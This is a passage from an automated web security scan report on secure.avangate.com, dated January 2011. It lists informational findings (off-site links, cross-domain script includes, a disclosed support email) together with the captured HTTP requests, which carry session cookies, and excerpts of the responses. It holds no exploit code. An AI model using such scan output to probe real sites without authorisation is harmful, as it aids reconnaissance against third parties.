...[SNIP]...
<td class="order__nojs__table__subtitle__wrap"><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014" class="sprite-ua sprite-ua-chrome order__nojs__table__icon" alt="Chrome" title="Google Chrome" /> <h2 class="order__nojs__table__subtitle">
...[SNIP]...
<td class="order__nojs__table__subtitle__wrap"><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014" class="sprite-ua sprite-ua-opera order__nojs__table__icon" alt="Opera" title="Opera" /> <h2 class="order__nojs__table__subtitle">
...[SNIP]...
<td class="order__nojs__table__subtitle__wrap"><img src="https://3619-avangate.voxcdn.com/content/images/spacer.gif?20050520162014" class="sprite-ua sprite-ua-safari order__nojs__table__icon" alt="Safari" title="Safari" /> <h2 class="order__nojs__table__subtitle">
...[SNIP]...
<!-- TEST -->
<script type="text/javascript" language="javascript" src="https://3619-avangate.voxcdn.com/content/static/js/order/442ed5d08223d696b58a57b06e731178/20101223093110.js?20101223093111"></script>
...[SNIP]...
<a href="http://www.omniture.com" title="Web Analytics"><img
src="https://102.122.2O7.net/b/ss/gecadavangate/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...

5.4. https://secure.avangate.com/order/privacy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/privacy.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /order/privacy.php?CART_ID=64575ad4eea753b4b2f5ceb944b5be73 HTTP/1.1
Host: secure.avangate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=iern1dj8k1v31cumbqs7gt7ssj8t8d54; GKD=%95%B8%B4%9D%A1%A9%91%AC%9E%A9%89%DB%B0%B2%A1%D0%90%BB%95%B9%A1%CB%B0%E2%A0%97%94u%92%AC%9A%CA%B0%BF%8C%9A%90%AB%85s%A2%A5%BC%A8;

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 02 Jan 2011 22:43:32 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 10264

<div class="order__box" style="">
   <div class="order__box__aux1">
       <div class="order__box__aux2">
           
                           <div class="order__box__title">
                   <div class="order__box__aux1">
                       <div class="orde
...[SNIP]...
<!-- TEST -->
<script type="text/javascript" language="javascript" src="https://3619-avangate.voxcdn.com/content/static/js/order/17aad0bb6ac14f932cc252c720c29135/20100713120959.js?20100825065453"></script>
...[SNIP]...
<a href="http://www.omniture.com" title="Web Analytics"><img
src="https://102.122.2O7.net/b/ss/gecadavangate/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...

5.5. https://secure.avangate.com/order/terms_conditions.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/terms_conditions.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /order/terms_conditions.php?CART_ID=64575ad4eea753b4b2f5ceb944b5be73 HTTP/1.1
Host: secure.avangate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=iern1dj8k1v31cumbqs7gt7ssj8t8d54; GKD=%95%B8%B4%9D%A1%A9%91%AC%9E%A9%89%DB%B0%B2%A1%D0%90%BB%95%B9%A1%CB%B0%E2%A0%97%94u%92%AC%9A%CA%B0%BF%8C%9A%90%AB%85s%A2%A5%BC%A8;

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 02 Jan 2011 22:43:47 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 14914

<div class="order__box" style="">
   <div class="order__box__aux1">
       <div class="order__box__aux2">
           
                           <div class="order__box__title">
                   <div class="order__box__aux1">
                       <div class="orde
...[SNIP]...
<!-- TEST -->
<script type="text/javascript" language="javascript" src="https://3619-avangate.voxcdn.com/content/static/js/order/17aad0bb6ac14f932cc252c720c29135/20100713120959.js?20100825065453"></script>
...[SNIP]...
<a href="http://www.omniture.com" title="Web Analytics"><img
src="https://102.122.2O7.net/b/ss/gecadavangate/1/H.20.3--NS/0"
height="1" width="1" border="0" alt="" />
</a>
...[SNIP]...

6. Cross-domain script include  previous  next
There are 6 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. https://secure.avangate.com/order/checkout.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/checkout.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /order/checkout.php?CART_ID=64575ad4eea753b4b2f5ceb944b5be73 HTTP/1.1
Host: secure.avangate.com
Connection: keep-alive
Referer: http://noteburner.com/order-noteburner.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=iern1dj8k1v31cumbqs7gt7ssj8t8d54; GKD=%95%B8%B4%9D%A1%A9%91%AC%9E%A9%89%DB%B0%B2%A1%D0%90%BB%95%B9%A1%CB%B0%E2%A0%97%94u%92%AC%9A%CA%B0%BF%8C%9A%90%AB%85s%A2%A5%BC%A8

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 02 Jan 2011 22:42:57 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 83844


<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <script type="text/javascript" language="JavaScript">
       if (window != top) {
           top.location.href = location.href;

...[SNIP]...
<!-- TEST -->
<script type="text/javascript" language="javascript" src="https://3619-avangate.voxcdn.com/content/static/js/order/6abf23a6a44f73c8ae38f4e41de26a8e/20101223093110.js?20101223093112"></script>
...[SNIP]...

6.2. https://secure.avangate.com/order/legal.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/legal.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /order/legal.php HTTP/1.1
Host: secure.avangate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=iern1dj8k1v31cumbqs7gt7ssj8t8d54; GKD=%95%B8%B4%9D%A1%A9%91%AC%9E%A9%89%DB%B0%B2%A1%D0%90%BB%95%B9%A1%CB%B0%E2%A0%97%94u%92%AC%9A%CA%B0%BF%8C%9A%90%AB%85s%A2%A5%BC%A8;

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 02 Jan 2011 22:43:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 3701

<div class="order__box" style="">
   <div class="order__box__aux1">
       <div class="order__box__aux2">
           
                           <div class="order__box__title">
                   <div class="order__box__aux1">
                       <div class="orde
...[SNIP]...
<!-- TEST -->
<script type="text/javascript" language="javascript" src="https://3619-avangate.voxcdn.com/content/static/js/order/17aad0bb6ac14f932cc252c720c29135/20100713120959.js?20100825065453"></script>
...[SNIP]...

6.3. https://secure.avangate.com/order/nojs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/nojs.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /order/nojs.php HTTP/1.1
Host: secure.avangate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=iern1dj8k1v31cumbqs7gt7ssj8t8d54; GKD=%95%B8%B4%9D%A1%A9%91%AC%9E%A9%89%DB%B0%B2%A1%D0%90%BB%95%B9%A1%CB%B0%E2%A0%97%94u%92%AC%9A%CA%B0%BF%8C%9A%90%AB%85s%A2%A5%BC%A8;

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 02 Jan 2011 22:43:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 15311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<!-- TEST -->
<script type="text/javascript" language="javascript" src="https://3619-avangate.voxcdn.com/content/static/js/order/442ed5d08223d696b58a57b06e731178/20101223093110.js?20101223093111"></script>
...[SNIP]...

6.4. https://secure.avangate.com/order/privacy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/privacy.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /order/privacy.php HTTP/1.1
Host: secure.avangate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=iern1dj8k1v31cumbqs7gt7ssj8t8d54; GKD=%95%B8%B4%9D%A1%A9%91%AC%9E%A9%89%DB%B0%B2%A1%D0%90%BB%95%B9%A1%CB%B0%E2%A0%97%94u%92%AC%9A%CA%B0%BF%8C%9A%90%AB%85s%A2%A5%BC%A8;

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 02 Jan 2011 22:43:30 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 10264

<div class="order__box" style="">
   <div class="order__box__aux1">
       <div class="order__box__aux2">
           
                           <div class="order__box__title">
                   <div class="order__box__aux1">
                       <div class="orde
...[SNIP]...
<!-- TEST -->
<script type="text/javascript" language="javascript" src="https://3619-avangate.voxcdn.com/content/static/js/order/17aad0bb6ac14f932cc252c720c29135/20100713120959.js?20100825065453"></script>
...[SNIP]...

6.5. https://secure.avangate.com/order/terms_conditions.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/terms_conditions.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /order/terms_conditions.php HTTP/1.1
Host: secure.avangate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=iern1dj8k1v31cumbqs7gt7ssj8t8d54; GKD=%95%B8%B4%9D%A1%A9%91%AC%9E%A9%89%DB%B0%B2%A1%D0%90%BB%95%B9%A1%CB%B0%E2%A0%97%94u%92%AC%9A%CA%B0%BF%8C%9A%90%AB%85s%A2%A5%BC%A8;

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 02 Jan 2011 22:43:40 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 14914

<div class="order__box" style="">
   <div class="order__box__aux1">
       <div class="order__box__aux2">
           
                           <div class="order__box__title">
                   <div class="order__box__aux1">
                       <div class="orde
...[SNIP]...
<!-- TEST -->
<script type="text/javascript" language="javascript" src="https://3619-avangate.voxcdn.com/content/static/js/order/17aad0bb6ac14f932cc252c720c29135/20100713120959.js?20100825065453"></script>
...[SNIP]...

6.6. https://secure.avangate.com/support/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /support/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/ HTTP/1.1
Host: secure.avangate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=iern1dj8k1v31cumbqs7gt7ssj8t8d54; GKD=%95%B8%B4%9D%A1%A9%91%AC%9E%A9%89%DB%B0%B2%A1%D0%90%BB%95%B9%A1%CB%B0%E2%A0%97%94u%92%AC%9A%CA%B0%BF%8C%9A%90%AB%85s%A2%A5%BC%A8;

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 02 Jan 2011 22:43:46 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 15819

<html ">    
   <head>
       <title>
                   Avangate | myAccount
               </title>
       <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
       <base href="https://secure.avangate.com/myaccount/">
       
           
...[SNIP]...
<!-- TEST -->
<script type="text/javascript" language="javascript" src="https://3619-avangate.voxcdn.com/content/static/js/myaccountavangate/6808b8c75bb8f8edd7300973f572493b/20101125110503.js?20101125110824"></script>
...[SNIP]...

7. Email addresses disclosed  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.avangate.com
Path:   /order/nojs.php

Issue detail

The following email address was disclosed in the response:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).

Request

GET /order/nojs.php HTTP/1.1
Host: secure.avangate.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=iern1dj8k1v31cumbqs7gt7ssj8t8d54; GKD=%95%B8%B4%9D%A1%A9%91%AC%9E%A9%89%DB%B0%B2%A1%D0%90%BB%95%B9%A1%CB%B0%E2%A0%97%94u%92%AC%9A%CA%B0%BF%8C%9A%90%AB%85s%A2%A5%BC%A8;

Response

HTTP/1.1 200 OK
Server: Avangate
Date: Sun, 02 Jan 2011 22:43:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 15311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf
...[SNIP]...
<a href="mailto:support@avangate.com">support@avangate.com</a>
...[SNIP]...

Report generated by XSS.CX at Sun Jan 02 19:17:49 CST 2011.